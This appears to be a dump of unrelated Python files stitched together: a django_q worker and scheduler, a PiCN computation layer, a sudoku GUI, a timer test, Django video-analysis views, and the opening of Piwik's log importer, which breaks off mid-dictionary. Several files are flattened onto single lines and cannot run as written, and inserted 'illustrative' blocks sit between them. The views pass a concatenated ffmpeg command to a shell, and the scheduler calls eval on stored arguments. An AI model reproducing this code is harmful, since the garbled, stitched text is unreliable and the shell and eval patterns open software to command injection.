# Start reading the task queue for task in iter(task_queue.get, "STOP"): result = None timer.value = -1 # Idle task_count += 1 # Get the function from the task logger.info(_(f'{name} processing [{task["name"]}]')) f = task["func"] # if it's not an instance try to get it from the string if not callable(task["func"]): try: module, func = f.rsplit(".", 1) m = importlib.import_module(module) f = getattr(m, func) except (ValueError, ImportError, AttributeError) as e: result = (e, False) if error_reporter: error_reporter.report() # We're still going if not result: close_old_django_connections() timer_value = task.pop("timeout", timeout) # signal execution pre_execute.send(sender="django_q", func=f, task=task) # execute the payload timer.value = timer_value # Busy try: res = f(*task["args"], **task["kwargs"]) result = (res, True) except Exception as e: result = (f"{e} : {traceback.format_exc()}", False) if error_reporter: error_reporter.report() if task.get("sync", False): raise with timer.get_lock(): # Process result task["result"] = result[0] task["success"] = result[1] task["stopped"] = timezone.now() result_queue.put(task) timer.value = -1 # Idle # Recycle if task_count == Conf.RECYCLE or rss_check(): timer.value = -2 # Recycled break logger.info(_(f"{name} stopped doing work")) def save_task(task, broker: Broker): """ Saves the task package to Django or the cache :param task: the task package :type broker: brokers.Broker """ # SAVE LIMIT < 0 : Don't save success if not task.get("save", Conf.SAVE_LIMIT >= 0) and task["success"]: return # enqueues next in a chain if task.get("chain", None): django_q.tasks.async_chain( task["chain"], group=task["group"], cached=task["cached"], sync=task["sync"], broker=broker, ) 
# SAVE LIMIT > 0: Prune database, SAVE_LIMIT 0: No pruning close_old_django_connections() try: if task["success"] and 0 < Conf.SAVE_LIMIT <= Success.objects.count(): Success.objects.last().delete() # check if this task has previous results if Task.objects.filter(id=task["id"], name=task["name"]).exists(): existing_task = Task.objects.get(id=task["id"], name=task["name"]) # only update the result if it hasn't succeeded yet if not existing_task.success: existing_task.stopped = task["stopped"] existing_task.result = task["result"] existing_task.success = task["success"] existing_task.attempt_count = existing_task.attempt_count + 1 existing_task.save() if Conf.MAX_ATTEMPTS > 0 and existing_task.attempt_count >= Conf.MAX_ATTEMPTS: broker.acknowledge(task['ack_id']) else: Task.objects.create( id=task["id"], name=task["name"], func=task["func"], hook=task.get("hook"), args=task["args"], kwargs=task["kwargs"], started=task["started"], stopped=task["stopped"], result=task["result"], group=task.get("group"), success=task["success"], attempt_count=1 ) except Exception as e: logger.error(e) def save_cached(task, broker: Broker): task_key = f'{broker.list_key}:{task["id"]}' timeout = task["cached"] if timeout is True: timeout = None try: group = task.get("group", None) iter_count = task.get("iter_count", 0) # if it's a group append to the group list if group: group_key = f"{broker.list_key}:{group}:keys" group_list = broker.cache.get(group_key) or [] # if it's an iter group, check if we are ready if iter_count and len(group_list) == iter_count - 1: group_args = f"{broker.list_key}:{group}:args" # collate the results into a Task result results = [ SignedPackage.loads(broker.cache.get(k))["result"] for k in group_list ] results.append(task["result"]) task["result"] = results task["id"] = group task["args"] = SignedPackage.loads(broker.cache.get(group_args)) task.pop("iter_count", None) task.pop("group", None) if task.get("iter_cached", None): task["cached"] = task.pop("iter_cached", None) save_cached(task, broker=broker) else: save_task(task, broker) broker.cache.delete_many(group_list) broker.cache.delete_many([group_key, group_args]) return # save the group list group_list.append(task_key) broker.cache.set(group_key, group_list, timeout) # async_task next in a chain if task.get("chain", None): django_q.tasks.async_chain( task["chain"], group=group, cached=task["cached"], sync=task["sync"], broker=broker, ) # save the task broker.cache.set(task_key, SignedPackage.dumps(task), timeout) except Exception as e: logger.error(e) def scheduler(broker: Broker = None): """ Creates a task from a schedule at the scheduled time and schedules next run """ if not broker: broker = get_broker() close_old_django_connections() try: with db.transaction.atomic(using=Schedule.objects.db): for s in ( Schedule.objects.select_for_update() .exclude(repeats=0) .filter(next_run__lt=timezone.now()) ): args = () kwargs = {} # get args, kwargs and hook if s.kwargs: try: # eval should be safe here because dict() kwargs = eval(f"dict({s.kwargs})") except SyntaxError: kwargs = {} if s.args: args = ast.literal_eval(s.args) # single value won't eval to tuple, so: if type(args) != tuple: args = (args,) q_options = kwargs.get("q_options", {}) if s.hook: q_options["hook"] = s.hook # set up the next run time if not s.schedule_type == s.ONCE: next_run = arrow.get(s.next_run) while True: if s.schedule_type == s.MINUTES: next_run = next_run.shift(minutes=+(s.minutes or 1)) elif s.schedule_type == s.HOURLY: next_run = next_run.shift(hours=+1) 
elif s.schedule_type == s.DAILY: next_run = next_run.shift(days=+1) elif s.schedule_type == s.WEEKLY: next_run = next_run.shift(weeks=+1) elif s.schedule_type == s.MONTHLY: next_run = next_run.shift(months=+1) elif s.schedule_type == s.QUARTERLY: next_run = next_run.shift(months=+3) elif s.schedule_type == s.YEARLY: next_run = next_run.shift(years=+1) elif s.schedule_type == s.CRON: if not croniter: raise ImportError( _( "Please install croniter to enable cron expressions" ) ) next_run = arrow.get( croniter(s.cron, timezone.now()).get_next() ) if Conf.CATCH_UP or next_run > arrow.utcnow(): break # arrow always returns a tz aware datetime, and we don't want # this when we explicitly configured django with USE_TZ=False s.next_run = ( next_run.datetime if settings.USE_TZ else next_run.datetime.replace(tzinfo=None) ) s.repeats += -1 # send it to the cluster q_options["broker"] = broker q_options["group"] = q_options.get("group", s.name or s.id) kwargs["q_options"] = q_options s.task = django_q.tasks.async_task(s.func, *args, **kwargs) # log it if not s.task: logger.error( _( f"{current_process().name} failed to create a task from schedule [{s.name or s.id}]" ) ) else: logger.info( _( f"{current_process().name} created a task from schedule [{s.name or s.id}]" ) ) # default behavior is to delete a ONCE schedule if s.schedule_type == s.ONCE: if s.repeats < 0: s.delete() continue # but not if it has a positive repeats s.repeats = 0 # save the schedule s.save() except Exception as e: logger.error(e) def close_old_django_connections(): """ Close django connections unless running with sync=True. """ if Conf.SYNC: logger.warning( "Preserving django database connections because sync=True. Beware " "that tasks are now injected in the calling context/transactions " "which may result in unexpected bahaviour." ) else: db.close_old_connections() def set_cpu_affinity(n: int, process_ids: list, actual: bool = not Conf.TESTING): """ Sets the cpu affinity for the supplied processes. Requires the optional psutil module. :param int n: affinity :param list process_ids: a list of pids :param bool actual: Test workaround for Travis not supporting cpu affinity """ # check if we have the psutil module if not psutil: logger.warning("Skipping cpu affinity because psutil was not found.") return # check if the platform supports cpu_affinity if actual and not hasattr(psutil.Process(process_ids[0]), "cpu_affinity"): logger.warning( "Faking cpu affinity because it is not supported on this platform" ) actual = False # get the available processors cpu_list = list(range(psutil.cpu_count())) # affinities of 0 or gte cpu_count, equals to no affinity if not n or n >= len(cpu_list): return # spread the workers over the available processors. index = 0 for pid in process_ids: affinity = [] for k in range(n): if index == len(cpu_list): index = 0 affinity.append(cpu_list[index]) index += 1 if psutil.pid_exists(pid): p = psutil.Process(pid) if actual: p.cpu_affinity(affinity) logger.info(_(f"{pid} will use cpu {affinity}")) def rss_check(): if Conf.MAX_RSS and resource: return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss >= Conf.MAX_RSS elif Conf.MAX_RSS and psutil: return psutil.Process().memory_info().rss >= Conf.MAX_RSS * 1024 return False
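# Illustrative usage sketch -- an addition, not part of upstream django_q.
# It shows how the Cluster defined above is driven: normally this happens via
# the `qcluster` management command, but the same calls can be made from a
# script inside a configured Django project (DJANGO_SETTINGS_MODULE set and
# django.setup() already done). 'math.copysign' is just an arbitrary
# importable function used as a task payload here.
if __name__ == "__main__":
    cluster = Cluster()                                       # default broker from Conf
    cluster.start()                                           # spawn the Sentinel, wait for start_event
    tid = django_q.tasks.async_task("math.copysign", 2, -2)   # queue a task through the broker
    print(django_q.tasks.result(tid, wait=5000))              # poll up to 5 seconds for the result
    cluster.stop()                                            # set stop_event and join the Sentinel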
PinnedComputationLayer.py
import multiprocessing
import threading
import time
from math import pow

from PiCN.Processes import LayerProcess
from PiCN.Packets import Name, Interest, Content, Nack, NackReason


class PinnedComputationLayer(LayerProcess):

    def __init__(self, replica_id, log_level=255):
        super().__init__(logger_name="PinnedNFNLayer (" + str(replica_id) + ")", log_level=log_level)
        self.storage = None

    def data_from_higher(self, to_lower: multiprocessing.Queue, to_higher: multiprocessing.Queue, data):
        pass  # this is already the highest layer.

    def data_from_lower(self, to_lower: multiprocessing.Queue, to_higher: multiprocessing.Queue, data):
        self.logger.info("Received packet")
        packet_id = data[0]
        packet = data[1]
        if isinstance(packet, Interest):
            self.logger.info("Received packet is an interest")
            self.handleInterest(packet_id, packet)
        else:
            self.logger.info("Received packet is not an interest")
            return

    def return_result(self, packet_id, content: Content):
        self.queue_to_lower.put([packet_id, content])

    def return_nack(self, packet_id, interest: Interest):
        self.queue_to_lower.put([packet_id, Nack(interest.name, reason=NackReason.NOT_SET,
                                                 interest=interest)])  # TODO -- choose an appropriate NACK reason

    def handleInterest(self, packet_id: int, interest: Interest):
        # A pinned-NFN name has the layout /<function components>/<param 1>/../<param N>/<N>/pNFN
        components = interest.name.components
        if components[-1] == b"pNFN":
            try:
                num_params = int(components[-2])
                self.params = components[-num_params - 2:-2]
                self.params = list(map(lambda x: x.decode('utf-8'), self.params))
                assert (num_params < len(interest.name.components) - 2)
                self.function_name = components[:-num_params - 2]
                self.function_name = "/" + "/".join(list(map(lambda x: x.decode('utf-8'), self.function_name)))
            except Exception:  # malformed name, wrong parameter count, bad encoding, ...
                self.return_nack(packet_id, interest)
                self.logger.info("Invalid computation expression. Return NACK.")
                return
            if self.function_name == "/the/prefix/square":
                self.return_result(packet_id, Content(interest.name, "5"))  # QUESTION -- return as string?
                self.logger.info("Result returned")
                arguments = [self.pinned_function_square, self.params, interest.name]
                t = threading.Thread(target=self.executePinnedFunction, args=arguments)
                t.daemon = True
                t.start()
                return
            else:
                self.return_nack(packet_id, interest)
                self.logger.info("Pinned function not available. Return NACK.")
                return
        else:
            self.logger.info("Received interest does not contain a computation expression")
            return

    ### defining some pinned functions

    def executePinnedFunction(self, function, params, interest_name: Name):
        result = function(params)
        new_components = interest_name.to_string().split("/")[1:-1]
        new_components.append("resultpNFN")
        new_name = "/" + '/'.join(new_components)
        content_object = Content(new_name, str(result))
        self.queue_to_lower.put([-1, content_object])

    def pinned_function_square(self, params):  # TODO -- check if params contains valid parameters
        time.sleep(5)
        return int(pow(int(params[0]), 2))

    def ageing(self):
        pass  # ageing not necessary
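# Illustrative parsing sketch -- an addition, not part of PiCN. It shows, on a
# plain list of byte components, how handleInterest above splits a pinned-NFN
# name of the form /<func>/.../<param 1>/.../<param N>/<N>/pNFN into a function
# name and its parameters. The sample name below is made up for illustration.
def _split_pnfn_components(components):
    num_params = int(components[-2])
    params = [c.decode("utf-8") for c in components[-num_params - 2:-2]]
    function_name = "/" + "/".join(c.decode("utf-8") for c in components[:-num_params - 2])
    return function_name, params


if __name__ == "__main__":
    sample = [b"the", b"prefix", b"square", b"4", b"1", b"pNFN"]
    print(_split_pnfn_components(sample))  # ('/the/prefix/square', ['4'])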
app.py
from os import makedirs, path as osPath from numpy import loadtxt, savetxt import threading from .given import given from .sudoku import Sudoku from .settings import DIGIT_NUMBER, GOAL, OpenButtonOption, RenderOption, SolveButtonOption, WriteButtonOption from .ui import Ui class App: def __init__(self): self.puzzle = None self.puzzlePath = None self.sudoku = None self.solveThread = None self.opening = False self.writing = False self.solving = False self.keyWaiting = False self.currentRowColumn = None self.ui = Ui() self.ui.openCmd = self.open self.ui.writeCmd = self.write self.ui.clearCmd = self.clear self.ui.solveCmd = self.solve self.ui.clickCmd = self.click self.ui.pressCmd = self.press self.ui.loadCommamd() def load(self, path): # Load a configuration to solve. with open(path, "r") as f: values = loadtxt(f).reshape((DIGIT_NUMBER, DIGIT_NUMBER)).astype(int) given.loadValues(values) self.sudoku = Sudoku(self.render) self.solveThread = threading.Thread(target=self.sudoku.solve) self.ui.drawGivenBoard() return def save(self, path, solution): # Save a configuration to a file. dirPath = osPath.dirname(osPath.abspath(path)) makedirs(dirPath, exist_ok=True) with open(path, "w") as f: savetxt(f, solution.reshape(DIGIT_NUMBER, DIGIT_NUMBER), fmt='%d') return def render(self, text, option=RenderOption.NORMAL): self.ui.showStatistic(text) if option != RenderOption.ONLY_TEXT: self.ui.statistic["text"] = text self.ui.drawRemainBoard(given.bestCandidate.gene) given.updateDuplicateValues() if given.bestCandidate.fitness == GOAL: self.ui.drawSolutionBg() else: self.ui.drawDuplicateBg() if option in [RenderOption.FOUNDED,RenderOption.NOT_FOUND]: self.solveThread = threading.Thread(target=self.sudoku.solve) self.ui.solveButtonSwitch(SolveButtonOption.READY) self.solving = False if option == RenderOption.FOUNDED: self.save("./solutions/" + self.puzzle, given.bestCandidate.gene) self.ui.window.update() def solve(self): if not self.solving: if self.solveThread.is_alive(): return self.solveThread.start() self.solving = True self.ui.solveButtonSwitch(SolveButtonOption.SOLVE) else: if not self.solveThread.is_alive(): return self.ui.solveButtonSwitch(SolveButtonOption.CANCEL) self.sudoku.exitFlag = True self.solveThread.join() self.solveThread = threading.Thread(target=self.sudoku.solve) self.solving = False self.ui.solveButtonSwitch(SolveButtonOption.READY) def clear(self): self.ui.showStatistic("") self.ui.drawRemainBoard(given.values) given.resetBestCandidate() given.updateDuplicateValues() self.ui.drawDuplicateBg() def open(self): if not self.opening: puzzlePath = self.ui.getPuzzleDialog() try: self.puzzle = osPath.basename(puzzlePath) self.load(puzzlePath) except: return self.ui.openButtonSwitch(OpenButtonOption.OPEN) self.opening = True else: given.resetBestCandidate() given.updateDuplicateValues() given.loadValues(given.zeroCandidate.gene) self.sudoku = None self.solveThread = None self.ui.drawRemainBoard(given.values) self.ui.drawGivenBoard() self.ui.drawDuplicateBg() self.ui.openButtonSwitch(OpenButtonOption.CLOSE) self.opening = False def write(self): if not self.writing: self.ui.writeButtonSwitch(WriteButtonOption.WRITE) given.resetBestCandidate(True) self.writing = True else: try: saveFile = self.ui.savePuzzleDialog() savetxt(saveFile, given.bestCandidate.gene.reshape(DIGIT_NUMBER, DIGIT_NUMBER), fmt='%d') saveFile.close() except: return self.clear() self.ui.writeButtonSwitch(WriteButtonOption.SAVE) self.writing = False def click(self, event): if self.solving: return if self.keyWaiting: 
self.keyWaiting = False row, col = self.currentRowColumn self.ui.drawItem(row,col,"") return else: if self.opening or self.writing: row, col = self.ui.clickToLogicalPosition(event.x, event.y) if given.values[row][col] != 0: return self.ui.drawItem(row,col,"X") self.currentRowColumn = (row, col) else: return self.keyWaiting = True def press(self, event): if not self.keyWaiting: return row, col = self.currentRowColumn if event.char in list(map(chr,range(ord("1"),ord("9")+1))): given.bestCandidate.gene[row,col] = int(event.char) self.ui.drawRemainBoard(given.bestCandidate.gene) given.updateDuplicateValues() self.ui.drawDuplicateBg() else: self.ui.drawItem(row,col,"") self.keyWaiting = False def run(self, puzzle = None): self.ui.mainloop()
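# Illustrative round-trip sketch -- an addition, not part of the original app.
# It demonstrates the on-disk puzzle format used by App.load/App.save above: a
# DIGIT_NUMBER x DIGIT_NUMBER grid of integers written with numpy.savetxt and
# read back with numpy.loadtxt. The path below is a made-up example.
def _puzzle_roundtrip_demo(path="./puzzles/example.txt", size=DIGIT_NUMBER):
    from numpy import loadtxt, savetxt, zeros
    grid = zeros((size, size), dtype=int)
    grid[0, 0] = 5  # place a single given digit
    makedirs(osPath.dirname(osPath.abspath(path)), exist_ok=True)
    with open(path, "w") as f:
        savetxt(f, grid, fmt='%d')  # same format App.save uses
    with open(path, "r") as f:
        loaded = loadtxt(f).reshape((size, size)).astype(int)
    return bool((loaded == grid).all())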
test2.py
import utility
import threading
import time

# Start the timer from a background thread, then poll the elapsed time.
threading.Thread(target=utility.startTimer).start()
time.sleep(2)
print(utility.getTime())
time.sleep(1)
print(utility.getTime())

# Restart the timer directly on the main thread and poll again.
utility.startTimer()
time.sleep(1)
print(utility.getTime())
time.sleep(1)
print(utility.getTime())
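# Hypothetical stand-in for the utility module used above -- an assumption, not
# the real implementation, which is not shown here. It is the minimal interface
# the calls utility.startTimer() / utility.getTime() appear to rely on: a
# module-level start timestamp plus an elapsed-seconds getter.
_start = None


def startTimer():
    global _start
    _start = time.time()


def getTime():
    return 0 if _start is None else int(time.time() - _start)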
views_dashboard.py
from django.shortcuts import render from django.http import HttpResponseRedirect, JsonResponse from django.contrib.auth import authenticate, login, logout from django.contrib.auth.models import User from speakInOut.helper import parse_session, authentication_check, register_user from .forms import LoginForm, AccountRegisterForm from .models import Speech from django.views.decorators.csrf import csrf_exempt from django.http import HttpResponse from django.core.files.storage import default_storage from django.core.files.base import ContentFile import threading import subprocess import json import os from textCompare import * from eyeTrack import track from fillerWordAnalyzer import analyze_text @csrf_exempt def dashboard_view(request): # Authentication check. Users currently logged in cannot view this page. authentication_result = authentication_check(request) if authentication_result is not None: return authentication_result template_data = parse_session(request) # get template data from session template_data['profile'] = User.objects.get(username=request.user) template_data['dashboard'] = True if request.method == "POST": vd = request.FILES.get("audiovideo", None) name = request.POST.get("name") print(type(vd)) path = default_storage.save('video/' + '123' + '.mp4', ContentFile(vd.read())) request.session['video_name'] = name # task = ThreadTask() # task.save() t = threading.Thread(target=longTask,args=[path,request,name]) t.setDaemon(True) t.start() return HttpResponse(status=200) return render(request, 'dashboard.html', template_data) # def startThreadTask(request): # task = ThreadTask() # task.save() # t = threading.Thread(target=longTask,args=[task.id]) # t.setDaemon(True) # t.start() # return JsonResponse({'id':task.id}) # # Check status of long tash # def checkThreadTask(request,id): # task = ThreadTask.objects.get(pk=id) # return JsonResponse({'is_done':task.is_done}) def longTask(video_path, request,name): print("Analyzing ",video_path) conf = track.analyzeFrames(video_path) print("Generating audio file") audio_file_name = os.path.basename(video_path).split('.')[0] + '.wav' command = "ffmpeg -i " + video_path + " -ab 160k -ac 2 -ar 44100 -vn audio/" + audio_file_name subprocess.call(command, shell=True) #Generating text from audio. audio_path = "audio/" + audio_file_name text_from_audio = audioTranscript(audio_path) print(text_from_audio) #Generating questions from text. 
questions = generateQuestionsFromText(text_from_audio) print(questions) final_quest = "" for i in range(8): if i< len(questions): final_quest += questions[i]+"," print("Final questions is" + final_quest) #Analysing filler words filler_percent = analyze_text.filler_percentage(text_from_audio) print(filler_percent) user_obj = User.objects.get(username=request.user) speech_obj = Speech() speech_obj.name = name speech_obj.user = user_obj speech_obj.video = video_path speech_obj.audio = audio_path speech_obj.filler_per = filler_percent speech_obj.gaze_count = conf speech_obj.generated_questions = final_quest speech_obj.speech2text = text_from_audio speech_obj.save() # task = ThreadTask.objects.get(pk=id) # task.is_done = True # task.save() # print("Finished task",id) def show_analysis(request): authentication_result = authentication_check(request) if authentication_result is not None: return authentication_result template_data = parse_session(request) # get template data from session template_data['profile'] = User.objects.get(username=request.user) template_data['dashboard'] = True name = template_data['video_name'] obj = Speech.objects.get(name = name, user = request.user) print("Printing") print(obj) template_data['obj'] = obj template_data['obj'].generated_questions_string = obj.generated_questions.split(",") print(template_data['obj'].name) return render(request, 'dashboard.html', template_data) @csrf_exempt def upload_manuscript(request): authentication_result = authentication_check(request) if authentication_result is not None: return authentication_result template_data = parse_session(request) video_name = template_data['video_name'] if request.method == 'POST': speech_obj = Speech.objects.get(name=video_name) speech_obj.manuscript = request.POST.get('manuscript_text') speech_obj.text_sim = compareTranscripts(speech_obj.speech2text,speech_obj.manuscript)*100 speech_obj.save() return HttpResponse(status=200) def myvideos(request): authentication_result = authentication_check(request) if authentication_result is not None: return authentication_result template_data = parse_session(request) template_data['myvideos'] = True all_speeches = Speech.objects.filter(user=request.user) template_data['videos'] = all_speeches return render(request, 'myvideos.html', template_data)
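# Illustrative sketch -- an addition, not part of the original views. It is a
# standalone version of the audio-extraction step inside longTask above, using
# an argument list instead of a concatenated shell string so unusual file names
# cannot break or inject into the command. The output directory mirrors the
# hard-coded "audio/" prefix used above and is an assumption.
def extract_audio(video_path, out_dir="audio"):
    os.makedirs(out_dir, exist_ok=True)
    audio_file_name = os.path.basename(video_path).split('.')[0] + '.wav'
    audio_path = os.path.join(out_dir, audio_file_name)
    subprocess.call([
        "ffmpeg", "-i", video_path,
        "-ab", "160k", "-ac", "2", "-ar", "44100", "-vn",
        audio_path,
    ])
    return audio_path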
import_logs.py
#!/usr/bin/python # vim: et sw=4 ts=4: # -*- coding: utf-8 -*- # # Piwik - free/libre analytics platform # # @link http://piwik.org # @license http://www.gnu.org/licenses/gpl-3.0.html GPL v3 or later # @version $Id$ # # For more info see: http://piwik.org/log-analytics/ and http://piwik.org/docs/log-analytics-tool-how-to/ # # Requires Python 2.6 or greater. # import base64 import bz2 import ConfigParser import datetime import fnmatch import gzip import hashlib import httplib import inspect import itertools import logging import optparse import os import os.path import Queue import re import sys import threading import time import urllib import urllib2 import urlparse import subprocess import functools import traceback import socket import textwrap try: import json except ImportError: try: import simplejson as json except ImportError: if sys.version_info < (2, 6): print >> sys.stderr, 'simplejson (http://pypi.python.org/pypi/simplejson/) is required.' sys.exit(1) ## ## Constants. ## STATIC_EXTENSIONS = set(( 'gif jpg jpeg png bmp ico svg svgz ttf otf eot woff class swf css js xml robots.txt webp' ).split()) DOWNLOAD_EXTENSIONS = set(( '7z aac arc arj asf asx avi bin csv deb dmg doc docx exe flv gz gzip hqx ' 'ibooks jar mpg mp2 mp3 mp4 mpeg mov movie msi msp odb odf odg odp ' 'ods odt ogg ogv pdf phps ppt pptx qt qtm ra ram rar rpm sea sit tar tbz ' 'bz2 tbz tgz torrent txt wav wma wmv wpd xls xlsx xml xsd z zip ' 'azw3 epub mobi apk' ).split()) # A good source is: http://phpbb-bots.blogspot.com/ EXCLUDED_USER_AGENTS = ( 'adsbot-google', 'ask jeeves', 'baidubot', 'bot-', 'bot/', 'ccooter/', 'crawl', 'curl', 'echoping', 'exabot', 'feed', 'googlebot', 'ia_archiver', 'java/', 'libwww', 'mediapartners-google', 'msnbot', 'netcraftsurvey', 'panopta', 'robot', 'spider', 'surveybot', 'twiceler', 'voilabot', 'yahoo', 'yandex', ) PIWIK_DEFAULT_MAX_ATTEMPTS = 3 PIWIK_DEFAULT_DELAY_AFTER_FAILURE = 10 DEFAULT_SOCKET_TIMEOUT = 300 PIWIK_EXPECTED_IMAGE = base64.b64decode( 'R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==' ) ## ## Formats. ## class BaseFormatException(Exception): pass class BaseFormat(object): def __init__(self, name): self.name = name self.regex = None self.date_format = '%d/%b/%Y:%H:%M:%S' def check_format(self, file): line = file.readline() file.seek(0) return self.check_format_line(line) def check_format_line(self, line): return False class JsonFormat(BaseFormat): def __init__(self, name): super(JsonFormat, self).__init__(name) self.json = None self.date_format = '%Y-%m-%dT%H:%M:%S' def check_format_line(self, line): try: self.json = json.loads(line) return True except: return False def match(self, line): try: self.json = json.loads(line) return self except: self.json = None return None def get(self, key): # Some ugly patchs ... 
if key == 'generation_time_milli': self.json[key] = int(self.json[key] * 1000) # Patch date format ISO 8601 elif key == 'date': tz = self.json[key][19:] self.json['timezone'] = tz.replace(':', '') self.json[key] = self.json[key][:19] try: return self.json[key] except KeyError: raise BaseFormatException() def get_all(self,): return self.json def remove_ignored_groups(self, groups): for group in groups: del self.json[group] class RegexFormat(BaseFormat): def __init__(self, name, regex, date_format=None): super(RegexFormat, self).__init__(name) if regex is not None: self.regex = re.compile(regex) if date_format is not None: self.date_format = date_format self.matched = None def check_format_line(self, line): return self.match(line) def match(self,line): if not self.regex: return None match_result = self.regex.match(line) if match_result: self.matched = match_result.groupdict() else: self.matched = None return match_result def get(self, key): try: return self.matched[key] except KeyError: raise BaseFormatException("Cannot find group '%s'." % key) def get_all(self,): return self.matched def remove_ignored_groups(self, groups): for group in groups: del self.matched[group] class W3cExtendedFormat(RegexFormat): FIELDS_LINE_PREFIX = '#Fields: ' fields = { 'date': '(?P<date>^\d+[-\d+]+', 'time': '[\d+:]+)[.\d]*?', # TODO should not assume date & time will be together not sure how to fix ATM. 'cs-uri-stem': '(?P<path>/\S*)', 'cs-uri-query': '(?P<query_string>\S*)', 'c-ip': '"?(?P<ip>[\d*.-]*)"?', 'cs(User-Agent)': '(?P<user_agent>".*?"|\S+)', 'cs(Referer)': '(?P<referrer>\S+)', 'sc-status': '(?P<status>\d+)', 'sc-bytes': '(?P<length>\S+)', 'cs-host': '(?P<host>\S+)', 'cs-username': '(?P<userid>\S+)', 'time-taken': '(?P<generation_time_secs>[.\d]+)' } def __init__(self): super(W3cExtendedFormat, self).__init__('w3c_extended', None, '%Y-%m-%d %H:%M:%S') def check_format(self, file): self.create_regex(file) # if we couldn't create a regex, this file does not follow the W3C extended log file format if not self.regex: file.seek(0) return first_line = file.readline() file.seek(0) return self.check_format_line(first_line) def create_regex(self, file): fields_line = None if config.options.w3c_fields: fields_line = config.options.w3c_fields # collect all header lines up until the Fields: line # if we're reading from stdin, we can't seek, so don't read any more than the Fields line header_lines = [] while fields_line is None: line = file.readline().strip() if not line: continue if not line.startswith('#'): break if line.startswith(W3cExtendedFormat.FIELDS_LINE_PREFIX): fields_line = line else: header_lines.append(line) if not fields_line: return # store the header lines for a later check for IIS self.header_lines = header_lines # Parse the 'Fields: ' line to create the regex to use full_regex = [] expected_fields = type(self).fields.copy() # turn custom field mapping into field => regex mapping # if the --w3c-time-taken-millisecs option is used, make sure the time-taken field is interpreted as milliseconds if config.options.w3c_time_taken_in_millisecs: expected_fields['time-taken'] = '(?P<generation_time_milli>[\d.]+)' for mapped_field_name, field_name in config.options.custom_w3c_fields.iteritems(): expected_fields[mapped_field_name] = expected_fields[field_name] del expected_fields[field_name] # add custom field regexes supplied through --w3c-field-regex option for field_name, field_regex in config.options.w3c_field_regexes.iteritems(): expected_fields[field_name] = field_regex # Skip the 'Fields: ' prefix. 
fields_line = fields_line[9:].strip() for field in re.split('\s+', fields_line): try: regex = expected_fields[field] except KeyError: regex = '(?:".*?"|\S+)' full_regex.append(regex) full_regex = '\s+'.join(full_regex) logging.debug("Based on 'Fields:' line, computed regex to be %s", full_regex) self.regex = re.compile(full_regex) def check_for_iis_option(self): if not config.options.w3c_time_taken_in_millisecs and self._is_time_taken_milli() and self._is_iis(): logging.info("WARNING: IIS log file being parsed without --w3c-time-taken-milli option. IIS" " stores millisecond values in the time-taken field. If your logfile does this, the aforementioned" " option must be used in order to get accurate generation times.") def _is_iis(self): return len([line for line in self.header_lines if 'internet information services' in line.lower() or 'iis' in line.lower()]) > 0 def _is_time_taken_milli(self): return 'generation_time_milli' not in self.regex.pattern class IisFormat(W3cExtendedFormat): fields = W3cExtendedFormat.fields.copy() fields.update({ 'time-taken': '(?P<generation_time_milli>[.\d]+)', 'sc-win32-status': '(?P<__win32_status>\S+)' # this group is useless for log importing, but capturing it # will ensure we always select IIS for the format instead of # W3C logs when detecting the format. This way there will be # less accidental importing of IIS logs w/o --w3c-time-taken-milli. }) def __init__(self): super(IisFormat, self).__init__() self.name = 'iis' class AmazonCloudFrontFormat(W3cExtendedFormat): fields = W3cExtendedFormat.fields.copy() fields.update({ 'x-event': '(?P<event_action>\S+)', 'x-sname': '(?P<event_name>\S+)', 'cs-uri-stem': '(?:rtmp:/)?(?P<path>/\S*)', 'c-user-agent': '(?P<user_agent>".*?"|\S+)', # following are present to match cloudfront instead of W3C when we know it's cloudfront 'x-edge-location': '(?P<x_edge_location>".*?"|\S+)', 'x-edge-result-type': '(?P<x_edge_result_type>".*?"|\S+)', 'x-edge-request-id': '(?P<x_edge_request_id>".*?"|\S+)', 'x-host-header': '(?P<x_host_header>".*?"|\S+)' }) def __init__(self): super(AmazonCloudFrontFormat, self).__init__() self.name = 'amazon_cloudfront' def get(self, key): if key == 'event_category' and 'event_category' not in self.matched: return 'cloudfront_rtmp' elif key == 'status' and 'status' not in self.matched: return '200' elif key == 'user_agent': user_agent = super(AmazonCloudFrontFormat, self).get(key) return urllib2.unquote(user_agent) else: return super(AmazonCloudFrontFormat, self).get(key) _HOST_PREFIX = '(?P<host>[\w\-\.]*)(?::\d+)?\s+' _COMMON_LOG_FORMAT = ( '(?P<ip>\S+)\s+\S+\s+\S+\s+\[(?P<date>.*?)\s+(?P<timezone>.*?)\]\s+' '"\S+\s+(?P<path>.*?)\s+\S+"\s+(?P<status>\S+)\s+(?P<length>\S+)' ) _NCSA_EXTENDED_LOG_FORMAT = (_COMMON_LOG_FORMAT + '\s+"(?P<referrer>.*?)"\s+"(?P<user_agent>.*?)"' ) _S3_LOG_FORMAT = ( '\S+\s+(?P<host>\S+)\s+\[(?P<date>.*?)\s+(?P<timezone>.*?)\]\s+(?P<ip>\S+)\s+' '\S+\s+\S+\s+\S+\s+\S+\s+"\S+\s+(?P<path>.*?)\s+\S+"\s+(?P<status>\S+)\s+\S+\s+(?P<length>\S+)\s+' '\S+\s+\S+\s+\S+\s+"(?P<referrer>.*?)"\s+"(?P<user_agent>.*?)"' ) _ICECAST2_LOG_FORMAT = ( _NCSA_EXTENDED_LOG_FORMAT + '\s+(?P<session_time>\S+)' ) FORMATS = { 'common': RegexFormat('common', _COMMON_LOG_FORMAT), 'common_vhost': RegexFormat('common_vhost', _HOST_PREFIX + _COMMON_LOG_FORMAT), 'ncsa_extended': RegexFormat('ncsa_extended', _NCSA_EXTENDED_LOG_FORMAT), 'common_complete': RegexFormat('common_complete', _HOST_PREFIX + _NCSA_EXTENDED_LOG_FORMAT), 'w3c_extended': W3cExtendedFormat(), 'amazon_cloudfront': 
